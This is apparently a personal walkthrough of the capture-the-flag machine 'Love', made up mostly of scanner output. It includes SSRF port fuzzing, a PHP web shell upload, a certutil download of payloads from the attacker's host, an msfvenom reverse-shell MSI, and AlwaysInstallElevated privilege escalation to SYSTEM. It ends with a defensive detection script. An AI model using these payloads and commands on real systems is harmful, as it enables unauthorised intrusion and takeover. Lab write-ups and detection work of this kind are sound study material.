200      GET       59l      204w     3314c http://10.10.10.239/bower_components/Flot/jquery.flot.resize.js
200      GET      346l     1328w    14216c http://10.10.10.239/bower_components/Flot/jquery.flot.navigate.js
200      GET      360l     1427w    13141c http://10.10.10.239/bower_components/Flot/jquery.flot.selection.js
200      GET     1198l     5575w    47378c http://10.10.10.239/bower_components/fullcalendar/CHANGELOG.md
200      GET       13l       82w      552c http://10.10.10.239/bower_components/bootstrap-colorpicker/LICENSE
200      GET      935l     2880w    26566c http://10.10.10.239/bower_components/PACE/pace.js
200      GET      137l      794w     5546c http://10.10.10.239/bower_components/ckeditor/styles.js
200      GET       10l       37w      396c http://10.10.10.239/bower_components/ckeditor/bower.json
200      GET       26l       48w      564c http://10.10.10.239/bower_components/ckeditor/package.json
200      GET       38l      178w     1321c http://10.10.10.239/bower_components/ckeditor/config.js
200      GET       39l       65w     1030c http://10.10.10.239/bower_components/bootstrap-datepicker/composer.json
200      GET      261l      583w     8632c http://10.10.10.239/bower_components/bootstrap-datepicker/Gruntfile.js
200      GET      491l     2964w    19697c http://10.10.10.239/bower_components/bootstrap-datepicker/CHANGELOG.md
200      GET       20l       28w      324c http://10.10.10.239/bower_components/bootstrap-daterangepicker/bower.json
200      GET       32l       72w      894c http://10.10.10.239/bower_components/bootstrap-daterangepicker/package.json
200      GET       74l      446w     3261c http://10.10.10.239/bower_components/bootstrap-datepicker/CODE_OF_CONDUCT.md
200      GET       18l       33w      573c http://10.10.10.239/bower_components/bootstrap-daterangepicker/package.js
200      GET      370l      619w     8383c http://10.10.10.239/bower_components/select2/Gruntfile.js
200      GET      202l     1581w    11358c http://10.10.10.239/bower_components/bootstrap-datepicker/LICENSE
200      GET       41l      403w     2561c http://10.10.10.239/bower_components/bootstrap-datepicker/CONTRIBUTING.md
200      GET      611l     1142w    14854c http://10.10.10.239/bower_components/bootstrap-daterangepicker/daterangepicker.scss
200      GET       48l       88w     1246c http://10.10.10.239/bower_components/bootstrap-datepicker/package.json
200      GET       64l      116w     1081c http://10.10.10.239/bower_components/raphael/webpack.config.js
200      GET       36l       66w      887c http://10.10.10.239/bower_components/Ionicons/composer.json
200      GET       16l       97w      720c http://10.10.10.239/bower_components/jvectormap/LICENSE-COMMERCIAL
200      GET     1498l     8678w    53572c http://10.10.10.239/bower_components/Flot/API.md
200      GET      135l      229w     6635c http://10.10.10.239/bower_components/jvectormap/jquery-jvectormap.css
200      GET       31l       59w      691c http://10.10.10.239/bower_components/Ionicons/bower.json
200      GET       21l      171w     1094c http://10.10.10.239/bower_components/Ionicons/LICENSE
200      GET     4463l    14467w   128945c http://10.10.10.239/bower_components/moment/moment.js
200      GET      140l      145w   309656c http://10.10.10.239/dist/css/adminlte.css.map
200      GET      415l     1296w    15611c http://10.10.10.239/bower_components/jquery-sparkline/src/base.js
200      GET      147l      432w     4339c http://10.10.10.239/bower_components/jquery-sparkline/src/vcanvas-base.js
200      GET       55l      193w     2029c http://10.10.10.239/bower_components/jquery-sparkline/src/simpledraw.js
200      GET      247l      612w     8353c http://10.10.10.239/bower_components/jquery-sparkline/src/interact.js
200      GET     5812l    15089w   123175c http://10.10.10.239/bower_components/mocha/mocha.js
200      GET      224l      731w     7056c http://10.10.10.239/bower_components/jquery-sparkline/src/utils.js
200      GET      256l     1012w    10845c http://10.10.10.239/bower_components/jquery-sparkline/src/chart-bar.js
200      GET       66l      243w     2837c http://10.10.10.239/bower_components/jquery-sparkline/src/chart-discrete.js
200      GET      165l      893w     7811c http://10.10.10.239/bower_components/jquery-sparkline/src/vcanvas-vml.js
200      GET      350l     1216w    15393c http://10.10.10.239/bower_components/jquery-sparkline/src/chart-line.js
200      GET       13l     1743w   240427c http://10.10.10.239/bower_components/jquery-ui/jquery-ui.min.js
200      GET        8l       60w      661c http://10.10.10.239/bower_components/mocha/media/logo.svg
200      GET        8l      167w     1058c http://10.10.10.239/bower_components/PACE/LICENSE
200      GET     1963l     2869w    66151c http://10.10.10.239/bower_components/bootstrap-datepicker/yarn.lock
200      GET      766l     3340w    35103c http://10.10.10.239/bower_components/moment/CHANGELOG.md
200      GET        3l     1189w    93251c http://10.10.10.239/bower_components/raphael/raphael.min.js
200      GET     1420l    11667w    76251c http://10.10.10.239/bower_components/ckeditor/LICENSE.md
200      GET       12l       20w      234c http://10.10.10.239/bower_components/bootstrap-datepicker/bower.json
200      GET       20l       51w      578c http://10.10.10.239/bower_components/ckeditor/composer.json
200      GET       21l      170w     1083c http://10.10.10.239/bower_components/raphael/license.txt
200      GET       31l       48w      516c http://10.10.10.239/bower_components/raphael/bower.json
200      GET      269l      778w     8163c http://10.10.10.239/bower_components/bootstrap-daterangepicker/daterangepicker.css
200      GET       19l       35w      429c http://10.10.10.239/bower_components/Ionicons/component.json
200      GET     1428l     4871w    41943c http://10.10.10.239/bower_components/Flot/excanvas.js
200      GET     1358l    14792w   172179c http://10.10.10.239/bower_components/ckeditor/CHANGES.md
200      GET      345l     1335w     9599c http://10.10.10.239/bower_components/Flot/jquery.flot.canvas.js
200      GET     1082l     7313w   563686c http://10.10.10.239/bower_components/ckeditor/ckeditor.js
200      GET        2l      210w    12507c http://10.10.10.239/bower_components/PACE/pace.min.js
301      GET        9l       30w      360c http://10.10.10.239/bower_components/jquery-knob => http://10.10.10.239/bower_components/jquery-knob/
200      GET     7927l    32618w   299364c http://10.10.10.239/bower_components/raphael/raphael.no-deps.js
301      GET        9l       30w      366c http://10.10.10.239/bower_components/fullcalendar/dist => http://10.10.10.239/bower_components/fullcalendar/dist/
301      GET        9l       30w      372c http://10.10.10.239/bower_components/bootstrap-timepicker/js => http://10.10.10.239/bower_components/bootstrap-timepicker/js/
503      GET       11l       44w      402c http://10.10.10.239/examples
200      GET     2012l     2913w    67903c http://10.10.10.239/bower_components/raphael/yarn.lock
200      GET      208l      373w     2955c http://10.10.10.239/bower_components/ckeditor/contents.css
301      GET        9l       30w      359c http://10.10.10.239/bower_components/moment/src => http://10.10.10.239/bower_components/moment/src/
301      GET        9l       30w      362c http://10.10.10.239/bower_components/Flot/examples => http://10.10.10.239/bower_components/Flot/examples/
301      GET        9l       30w      365c http://10.10.10.239/bower_components/ckeditor/plugins => http://10.10.10.239/bower_components/ckeditor/plugins/
301      GET        9l       30w      375c http://10.10.10.239/bower_components/ckeditor/plugins/templates => http://10.10.10.239/bower_components/ckeditor/plugins/templates/
200      GET      755l     2268w    18527c http://10.10.10.239/bower_components/PACE/pace.coffee
200      GET     8160l    32872w   215256c http://10.10.10.239/bower_components/jquery/dist/jquery.slim.js
200      GET      755l     4545w   389831c http://10.10.10.239/bower_components/bootstrap-daterangepicker/drp.png
200      GET     4023l    24508w  2157014c http://10.10.10.239/dist/img/photo4.jpg
200      GET     1626l     5242w    69588c http://10.10.10.239/bower_components/bootstrap-daterangepicker/daterangepicker.js
301      GET        9l       30w      368c http://10.10.10.239/bower_components/ckeditor/samples/js => http://10.10.10.239/bower_components/ckeditor/samples/js/
301      GET        9l       30w      369c http://10.10.10.239/bower_components/ckeditor/samples/css => http://10.10.10.239/bower_components/ckeditor/samples/css/
301      GET        9l       30w      374c http://10.10.10.239/bower_components/ckeditor/plugins/language => http://10.10.10.239/bower_components/ckeditor/plugins/language/
301      GET        9l       30w      365c http://10.10.10.239/bower_components/ckeditor/samples => http://10.10.10.239/bower_components/ckeditor/samples/
200      GET     3168l    12352w   122971c http://10.10.10.239/bower_components/Flot/jquery.flot.js
200      GET     8353l    34429w   314913c http://10.10.10.239/bower_components/raphael/raphael.js
200      GET        3l     1127w    90152c http://10.10.10.239/bower_components/raphael/raphael.no-deps.min.js
200      GET    28009l    80981w  1276366c http://10.10.10.239/bower_components/Ionicons/cheatsheet.html
200      GET     2547l    15691w  1213097c http://10.10.10.239/dist/img/photo1.png
301      GET        9l       30w      363c http://10.10.10.239/bower_components/moment/src/lib => http://10.10.10.239/bower_components/moment/src/lib/
200      GET       18l       62w     1199c http://10.10.10.239/bower_components/Ionicons/src/android-bus.svg
200      GET       18l       62w     1334c http://10.10.10.239/bower_components/Ionicons/src/eye-disabled.svg
200      GET       11l       54w      776c http://10.10.10.239/bower_components/Ionicons/src/ios-home-outline.svg
200      GET        9l       49w      825c http://10.10.10.239/bower_components/Ionicons/src/chatbubble.svg
301      GET        9l       30w      382c http://10.10.10.239/bower_components/bootstrap-daterangepicker/website => http://10.10.10.239/bower_components/bootstrap-daterangepicker/website/
301      GET        9l       30w      369c http://10.10.10.239/bower_components/ckeditor/plugins/xml => http://10.10.10.239/bower_components/ckeditor/plugins/xml/
301      GET        9l       30w      371c http://10.10.10.239/bower_components/ckeditor/plugins/about => http://10.10.10.239/bower_components/ckeditor/plugins/about/
301      GET        9l       30w      361c http://10.10.10.239/bower_components/Ionicons/png => http://10.10.10.239/bower_components/Ionicons/png/
301      GET        9l       30w      368c http://10.10.10.239/bower_components/Flot/examples/image => http://10.10.10.239/bower_components/Flot/examples/image/
301      GET        9l       30w      365c http://10.10.10.239/bower_components/raphael/dev/test => http://10.10.10.239/bower_components/raphael/dev/test/
200      GET        7l       57w      611c http://10.10.10.239/bower_components/Ionicons/src/star.svg
200      GET       12l       56w      701c http://10.10.10.239/bower_components/Ionicons/src/android-contract.svg
200      GET        7l       53w      556c http://10.10.10.239/bower_components/Ionicons/src/android-send.svg
200      GET        9l       50w      811c http://10.10.10.239/bower_components/Ionicons/src/android-notifications.svg
200      GET        8l       48w      693c http://10.10.10.239/bower_components/Ionicons/src/battery-full.svg
200      GET       33l      106w     1908c http://10.10.10.239/bower_components/Ionicons/src/ios-partlysunny-outline.svg
200      GET        7l       47w      568c http://10.10.10.239/bower_components/Ionicons/src/ios-fastforward.svg
301      GET        9l       30w      363c http://10.10.10.239/bower_components/jvectormap/src => http://10.10.10.239/bower_components/jvectormap/src/
301      GET        9l       30w      365c http://10.10.10.239/bower_components/moment/templates => http://10.10.10.239/bower_components/moment/templates/
200      GET       10l       50w      898c http://10.10.10.239/bower_components/Ionicons/src/checkmark.svg
200      GET        7l       47w      568c http://10.10.10.239/bower_components/Ionicons/src/ios-rewind.svg
200      GET       14l       56w     1083c http://10.10.10.239/bower_components/Ionicons/src/ios-cart.svg
200      GET       23l       67w     2130c http://10.10.10.239/bower_components/Ionicons/src/happy-outline.svg
200      GET       26l       70w     1666c http://10.10.10.239/bower_components/Ionicons/src/android-contacts.svg
200      GET       29l       76w     2661c http://10.10.10.239/bower_components/Ionicons/src/ios-rose-outline.svg
200      GET       25l       71w     1849c http://10.10.10.239/bower_components/Ionicons/src/radio-waves.svg
200      GET       12l       64w      685c http://10.10.10.239/bower_components/Ionicons/src/ios-browsers-outline.svg
200      GET       12l       53w     1104c http://10.10.10.239/bower_components/Ionicons/src/ios-cloud-outline.svg
200      GET       15l       55w     1329c http://10.10.10.239/bower_components/Ionicons/src/gear-a.svg
200      GET        7l       53w      564c http://10.10.10.239/bower_components/Ionicons/src/ios-volume-low.svg
200      GET       11l       52w      626c http://10.10.10.239/bower_components/Ionicons/src/android-add.svg
301      GET        9l       30w      346c http://10.10.10.239/ADMIN/Includes => http://10.10.10.239/ADMIN/Includes/
200      GET       10l       51w      673c http://10.10.10.239/bower_components/Ionicons/src/ios-home.svg
301      GET        9l       30w      346c http://10.10.10.239/Admin/includes => http://10.10.10.239/Admin/includes/
200      GET       12l       56w      898c http://10.10.10.239/bower_components/Ionicons/src/ios-trash.svg
200      GET       12l       60w      751c http://10.10.10.239/bower_components/Ionicons/src/android-apps.svg
200      GET       11l       52w      740c http://10.10.10.239/bower_components/Ionicons/src/ios-pie.svg
200      GET       11l       52w      990c http://10.10.10.239/bower_components/Ionicons/src/tshirt-outline.svg
200      GET       12l       52w     1159c http://10.10.10.239/bower_components/Ionicons/src/ios-pulse-strong.svg
200      GET       13l       55w      830c http://10.10.10.239/bower_components/Ionicons/src/android-checkbox-outline.svg
301      GET        9l       30w      365c http://10.10.10.239/bower_components/select2/dist/CSS => http://10.10.10.239/bower_components/select2/dist/CSS/
200      GET       10l       50w      636c http://10.10.10.239/bower_components/Ionicons/src/ios-checkmark-empty.svg
200      GET       44l       90w     4251c http://10.10.10.239/bower_components/Ionicons/src/ios-people-outline.svg
200      GET       15l       57w     1250c http://10.10.10.239/bower_components/Ionicons/src/erlenmeyer-flask-bubbles.svg
200      GET       17l       69w      966c http://10.10.10.239/bower_components/Ionicons/src/ios-thunderstorm.svg
200      GET       22l       66w     2008c http://10.10.10.239/bower_components/Ionicons/src/social-foursquare-outline.svg
200      GET        8l       49w      662c http://10.10.10.239/bower_components/Ionicons/src/ios-bolt-outline.svg
200      GET        9l       50w      768c http://10.10.10.239/bower_components/Ionicons/src/android-upload.svg
200      GET       10l       52w      904c http://10.10.10.239/bower_components/Ionicons/src/android-clipboard.svg
200      GET        9l       50w      601c http://10.10.10.239/bower_components/Ionicons/src/social-hackernews.svg
301      GET        9l       30w      346c http://10.10.10.239/ADMIN/includes => http://10.10.10.239/ADMIN/includes/
200      GET       13l       53w     1016c http://10.10.10.239/bower_components/Ionicons/src/ios-stopwatch.svg
200      GET       15l       57w      968c http://10.10.10.239/bower_components/Ionicons/src/skip-backward.svg
200      GET        8l       48w      639c http://10.10.10.239/bower_components/Ionicons/src/ios-grid-view-outline.svg
200      GET       20l       62w     1788c http://10.10.10.239/bower_components/Ionicons/src/social-wordpress.svg
200      GET       21l       64w     1920c http://10.10.10.239/bower_components/Ionicons/src/social-python.svg
200      GET       17l       71w      948c http://10.10.10.239/bower_components/Ionicons/src/ios-information-outline.svg
200      GET       28l       79w     2712c http://10.10.10.239/bower_components/Ionicons/src/beer.svg
200      GET        0l        0w   470596c http://10.10.10.239/bower_components/jquery-ui/jquery-ui.js
200      GET       10l       51w      697c http://10.10.10.239/bower_components/Ionicons/src/arrow-swap.svg
200      GET       10l       55w      642c http://10.10.10.239/bower_components/Ionicons/src/ios-monitor.svg
200      GET        8l       50w      648c http://10.10.10.239/bower_components/Ionicons/src/ios-skipbackward-outline.svg
200      GET        9l       50w      627c http://10.10.10.239/bower_components/Ionicons/src/minus-circled.svg
200      GET       24l       66w     2249c http://10.10.10.239/bower_components/Ionicons/src/ios-analytics-outline.svg
200      GET       18l       67w     1240c http://10.10.10.239/bower_components/Ionicons/src/ios-loop-strong.svg
200      GET       11l       58w      608c http://10.10.10.239/bower_components/Ionicons/src/android-navigate.svg
200      GET       17l       61w     1313c http://10.10.10.239/bower_components/Ionicons/src/social-javascript.svg
200      GET       18l       71w      923c http://10.10.10.239/bower_components/Ionicons/src/ios-plus-outline.svg
301      GET        9l       30w      363c http://10.10.10.239/bower_components/jquery-knob/JS => http://10.10.10.239/bower_components/jquery-knob/JS/
200      GET       11l       55w      676c http://10.10.10.239/bower_components/Ionicons/src/ios-pricetag.svg
200      GET       14l       64w     1130c http://10.10.10.239/bower_components/Ionicons/src/log-in.svg
200      GET       11l       52w      782c http://10.10.10.239/bower_components/Ionicons/src/share.svg
200      GET       16l       60w     1366c http://10.10.10.239/bower_components/Ionicons/src/pull-request.svg
200      GET       10l       51w      728c http://10.10.10.239/bower_components/Ionicons/src/ios-checkmark.svg
200      GET       12l       53w      871c http://10.10.10.239/bower_components/Ionicons/src/eject.svg
301      GET        9l       30w      370c http://10.10.10.239/bower_components/select2/tests/results => http://10.10.10.239/bower_components/select2/tests/results/
301      GET        9l       30w      370c http://10.10.10.239/bower_components/jquery-ui/themes/base => http://10.10.10.239/bower_components/jquery-ui/themes/base/
301      GET        9l       30w      354c http://10.10.10.239/plugins/iCheck/minimal => http://10.10.10.239/plugins/iCheck/minimal/
301      GET        9l       30w      377c http://10.10.10.239/bower_components/bootstrap-datepicker/dist/JS => http://10.10.10.239/bower_components/bootstrap-datepicker/dist/JS/
301      GET        9l       30w      367c http://10.10.10.239/bower_components/select2/tests/DATA => http://10.10.10.239/bower_components/select2/tests/DATA/
[>-------------------] - 16s    51663/1261609 6m      found:420     errors:41831  
[#>------------------] - 16s     1846/30000   117/s   http://10.10.10.239/ 
[####################] - 7s     30000/30000   4044/s  http://10.10.10.239/images/ => Directory listing
[####################] - 8s     30000/30000   3815/s  http://10.10.10.239/includes/ => Directory listing
[>-------------------] - 16s      883/30000   56/s    http://10.10.10.239/admin/ 
[####################] - 1s     30000/30000   28143/s http://10.10.10.239/plugins/ => Directory listing
[####################] - 1s     30000/30000   21708/s http://10.10.10.239/bower_components/datatables.net-bs/js/ => Directory listing
[####################] - 4s     30000/30000   7671/s  http://10.10.10.239/bower_components/jquery/dist/ => Directory listing
[####################] - 1s     30000/30000   29821/s http://10.10.10.239/bower_components/font-awesome/css/ => Directory listing
[####################] - 0s     30000/30000   230769/s http://10.10.10.239/bower_components/fastclick/lib/ => Directory listing
[####################] - 0s     30000/30000   232558/s http://10.10.10.239/dist/ => Directory listing
[####################] - 0s     30000/30000   260870/s http://10.10.10.239/bower_components/fastclick/ => Directory listing
[####################] - 7s     30000/30000   4145/s  http://10.10.10.239/bower_components/datatables.net-bs/ => Directory listing
[####################] - 7s     30000/30000   4096/s  http://10.10.10.239/bower_components/jquery/ => Directory listing
[####################] - 0s     30000/30000   384615/s http://10.10.10.239/bower_components/datatables.net/ => Directory listing
[####################] - 0s     30000/30000   100000/s http://10.10.10.239/dist/js/ => Directory listing
[#>------------------] - 15s     2279/30000   148/s   http://10.10.10.239/Admin/ 
[####################] - 2s     30000/30000   13061/s http://10.10.10.239/dist/css/ => Directory listing
[####################] - 5s     30000/30000   6598/s  http://10.10.10.239/dist/img/ => Directory listing
[####################] - 0s     30000/30000   117647/s http://10.10.10.239/bower_components/datatables.net/js/ => Directory listing
[####################] - 7s     30000/30000   4258/s  http://10.10.10.239/dist/js/pages/ => Directory listing
[>-------------------] - 15s      713/30000   47/s    http://10.10.10.239/Admin/includes/ 
[####################] - 0s     30000/30000   252101/s http://10.10.10.239/bower_components/datatables.net-bs/css/ => Directory listing
[####################] - 7s     30000/30000   4131/s  http://10.10.10.239/bower_components/bootstrap/ => Directory listing
[####################] - 0s     30000/30000   265487/s http://10.10.10.239/bower_components/font-awesome/ => Directory listing
[####################] - 7s     30000/30000   4199/s  http://10.10.10.239/plugins/iCheck/ => Directory listing
[####################] - 7s     30000/30000   4241/s  http://10.10.10.239/bower_components/font-awesome/less/ => Directory listing
301      GET        9l       30w      366c http://10.10.10.239/bower_components/moment/src/locale => http://10.10.10.239/bower_components/moment/src/locale/
301      GET        9l       30w      367c http://10.10.10.239/bower_components/Flot/examples/Ajax => http://10.10.10.239/bower_components/Flot/examples/Ajax/
301      GET        9l       30w      371c http://10.10.10.239/bower_components/ckeditor/plugins/About => http://10.10.10.239/bower_components/ckeditor/plugins/About/
301      GET        9l       30w      368c http://10.10.10.239/bower_components/select2/tests/Utils => http://10.10.10.239/bower_components/select2/tests/Utils/
301      GET        9l       30w      370c http://10.10.10.239/bower_components/ckeditor/plugins/AJAX => http://10.10.10.239/bower_components/ckeditor/plugins/AJAX/
301      GET        9l       30w      369c http://10.10.10.239/bower_components/ckeditor/plugins/div => http://10.10.10.239/bower_components/ckeditor/plugins/div/
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_10_10_239-1737082166.state ...
[##>-----------------] - 55s   176110/1261615 5m      found:426     errors:142466 
[###>----------------] - 55s     4697/30000   86/s    http://10.10.10.239/ 
[####################] - 7s     30000/30000   4044/s  http://10.10.10.239/images/ => Directory listing
[####################] - 8s     30000/30000   3815/s  http://10.10.10.239/includes/ => Directory listing
[##>-----------------] - 54s     3805/30000   70/s    http://10.10.10.239/admin/ 
[####################] - 1s     30000/30000   28143/s http://10.10.10.239/plugins/ => Directory listing
[####################] - 1s     30000/30000   21708/s http://10.10.10.239/bower_components/datatables.net-bs/js/ => Directory listing
[####################] - 4s     30000/30000   7671/s  http://10.10.10.239/bower_components/jquery/dist/ => Directory listing
[####################] - 1s     30000/30000   29821/s http://10.10.10.239/bower_components/font-awesome/css/ => Directory listing
[####################] - 0s     30000/30000   230769/s http://10.10.10.239/bower_components/fastclick/lib/ => Directory listing
[####################] - 0s     30000/30000   232558/s http://10.10.10.239/dist/ => Directory listing
[####################] - 0s     30000/30000   260870/s http://10.10.10.239/bower_components/fastclick/ => Directory listing
[####################] - 7s     30000/30000   4145/s  http://10.10.10.239/bower_components/datatables.net-bs/ => Directory listing
[####################] - 7s     30000/30000   4096/s  http://10.10.10.239/bower_components/jquery/ => Directory listing
[####################] - 0s     30000/30000   384615/s http://10.10.10.239/bower_components/datatables.net/ => Directory listing
[####################] - 0s     30000/30000   100000/s http://10.10.10.239/dist/js/ => Directory listing
[###>----------------] - 54s     5172/30000   95/s    http://10.10.10.239/Admin/ 
[####################] - 2s     30000/30000   13061/s http://10.10.10.239/dist/css/ => Directory listing
[####################] - 5s     30000/30000   6598/s  http://10.10.10.239/dist/img/ => Directory listing
[####################] - 0s     30000/30000   117647/s http://10.10.10.239/bower_components/datatables.net/js/ => Directory listing
[####################] - 7s     30000/30000   4258/s  http://10.10.10.239/dist/js/pages/ => Directory listing
[##>-----------------] - 54s     3668/30000   68/s    http://10.10.10.239/Admin/includes/ 
[####################] - 0s     30000/30000   252101/s http://10.10.10.239/bower_components/datatables.net-bs/css/ => Directory listing
[####################] - 7s     30000/30000   4131/s  http://10.10.10.239/bower_components/bootstrap/ => Directory listing
[####################] - 0s     30000/30000   265487/s http://10.10.10.239/bower_components/font-awesome/ => Directory listing
[####################] - 7s     30000/30000   4199/s  http://10.10.10.239/plugins/iCheck/ => Directory listing 

443/tcp open ssl/http

sh
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
 

445/tcp open

sh
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
sh
smbclient -N -L \\\\10.10.10.239
session setup failed: NT_STATUS_ACCESS_DENIED

5000/tcp open http

sh
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
 

ffuf vhost

sh
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://love.htb/ -H 'Host: FUZZ.love.htb' -fs 4388 -mc all
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://love.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.love.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response size: 4388
________________________________________________
 
staging                 [Status: 200, Size: 5357, Words: 1543, Lines: 192, Duration: 44ms]
:: Progress: [4989/4989] :: Job [1/1] :: 190 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
sh
nano /etc/hosts
10.10.10.239 staging.love.htb

staging.love.htb

sh
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.239 - - [16/Jan/2025 22:02:27] "GET / HTTP/1.1" 200 -

numbers.py

python
# Write ports 1-10000, one per line, to use as the ffuf wordlist
with open('numbers.txt', 'w') as file:
    for i in range(1, 10001):
        file.write(f"{i}\n")
sh
python3 numbers.py
sh
ffuf -u http://staging.love.htb/beta.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "file=http://127.0.0.1:FUZZ&read=Scan+file" -w numbers.txt:FUZZ -fs 4997
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : POST
 :: URL              : http://staging.love.htb/beta.php
 :: Wordlist         : FUZZ: /home/sake/htb-labs/Love/numbers.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : file=http://127.0.0.1:FUZZ&read=Scan+file
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 4997
________________________________________________
 
80                      [Status: 200, Size: 9385, Words: 1901, Lines: 337, Duration: 26ms]
443                     [Status: 200, Size: 5466, Words: 1296, Lines: 224, Duration: 26ms]
 
  • since port 5000 cannot be accessed directly, we can try reaching it locally through the scanner on beta.php

@LoveIsInTheAir!!!!

  • managed to access http://love.htb/admin

# Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)

  • https://www.exploit-db.com/exploits/49445
  • edit the profile picture directly with a PHP shell
  • echo '<?php system($_GET[0]); ?>' > shell.php

powercat rev shell

sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.239] 59570
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

user.txt

cmd
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
3fc8c520...

priv esc

cmd
certutil.exe -f -urlcache -split http://10.10.14.6/winPEASx64.exe winPEASx64.exe
sh
 
╔══════════╣ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.19041.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 51B

AlwaysInstallElevated

cmd
╔══════════╣ Checking AlwaysInstallElevated
╚  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!
sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f msi -o reverse.msi
cmd
certutil.exe -f -urlcache -split http://10.10.14.6/reverse.msi reverse.msi
cmd
msiexec /quiet /qn /i C:\Users\Phoebe\reverse.msi
sh
nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.239] 59575
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
 
C:\WINDOWS\system32>whoami
whoami
nt authority\system
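The certutil download and quiet msiexec install above both leave distinctive process command lines. Detection logic for them over process-creation records, as an added Python example that is not part of the original writeup (the rule names, the record shape and `SAMPLE_EVENTS` are assumptions constructed for illustration):

```python
import re

# Switches may be written with "-" or "/"; matching is case-insensitive.
URLCACHE = re.compile(r"(?i)(?:^|\s)[-/]urlcache(?=\s|$)")
REMOTE_URL = re.compile(r"(?i)\bhttps?://\S+")
MSI_INSTALL = re.compile(r'(?i)(?:^|\s)[-/](?:i|package)\s+(?:"([^"]+\.msi)"|(\S+\.msi))')
MSI_QUIET = re.compile(r"(?i)(?:^|\s)[-/](?:quiet|q[nb]?)(?=\s|$)")
USER_WRITABLE = re.compile(r"(?i)^(?:[a-z]:\\(?:users|programdata|windows\\temp)\\|https?://)")


def classify(image, command_line):
    """Return the names of the rules one process-creation record triggers."""
    exe = image.lower().rsplit("\\", 1)[-1]
    hits = []
    if exe == "certutil.exe" and URLCACHE.search(command_line) \
            and REMOTE_URL.search(command_line):
        hits.append("certutil_urlcache_download")
    if exe == "msiexec.exe":
        pkg = MSI_INSTALL.search(command_line)
        path = (pkg.group(1) or pkg.group(2)) if pkg else ""
        if USER_WRITABLE.search(path) and MSI_QUIET.search(command_line):
            hits.append("quiet_msi_from_user_writable_path")
    return hits


# Constructed records shaped like process-creation events (Image, CommandLine).
# The first two command lines are the ones used in the walkthrough.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -f -urlcache -split http://10.10.14.6/reverse.msi reverse.msi"),
    (r"C:\Windows\System32\msiexec.exe",
     r"msiexec /quiet /qn /i C:\Users\Phoebe\reverse.msi"),
    (r"C:\Windows\System32\msiexec.exe",
     r'msiexec.exe /i "C:\Program Files\Vendor\setup.msi" /qn'),
    (r"C:\Windows\System32\certutil.exe", r"certutil.exe -verify server.cer"),
]


def scan(events):
    """Return {index: [rule, ...]} for every record that triggers a rule."""
    return {i: hits for i, e in enumerate(events) if (hits := classify(*e))}


if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index][1], rules)
```

Detection is the backstop here; the fix is to clear the AlwaysInstallElevated value under SOFTWARE\Policies\Microsoft\Windows\Installer in both HKLM and HKCU, since the policy only takes effect when both are set to 1.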

root.txt

cmd
C:\Users\Administrator\Desktop>type root.txt
type root.txt
99e22c3f...